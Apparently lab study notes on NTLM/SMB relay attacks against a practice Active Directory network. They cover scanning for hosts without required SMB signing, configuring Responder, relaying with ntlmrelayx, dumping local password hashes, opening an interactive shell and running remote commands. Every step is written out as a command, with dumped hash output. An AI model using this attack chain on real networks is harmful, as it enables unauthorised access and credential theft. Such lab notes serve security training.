Instead of cracking, PASS/RELAY it to gain access!
By default:
SMB signing is disabled on user accounts
SMB signing is enabled on server accounts
Identify Hosts without SMB Signing:
nmap --script=smb2-security-mode.nse -p445 192.168.218.136 -Pn-Pn checks host anyway
adjusting Responder:
sudo mousepad /etc/responder/Responder.confswitch SMB and HTTP to Off
then run responder
Scanning Domain Controller:
Message signing enabled and REQUIRED. Can’t do it.
Scanning one of the computers:
Message signing enabled but NOT REQUIRED. What we want.
You can run it on everything and catch back the ones that are not by using grep:
nmap --script=smb2-security-mode.nse -p445 192.168.218.0/24 -Pn | grep not -A 2DISCORD TIP: USE CME
cme smb 192.168.218.0/24 --gen-relay-list relay.list
Note: SPIDERMAN was offline that's why it wasn’t found!
relay.list can be used with ntlmrelayx
ntlmrelayx.py -tf relay.list -smb2support-tf is target file. Could be relay.list or it could be targets.txt if we did it the nmap way!
Hashes dumped:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:8018cdf5a02e39797ef1cd07b654939c:::
peterparker:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::to use interactive mode:
ntlmrelayx.py -tf relay.list -smb2support -iand listen to it with:
nc 127.0.0.1 11000you can type help to find commands!
ntlmrelayx.py -tf relay.list -smb2support -c "whoami"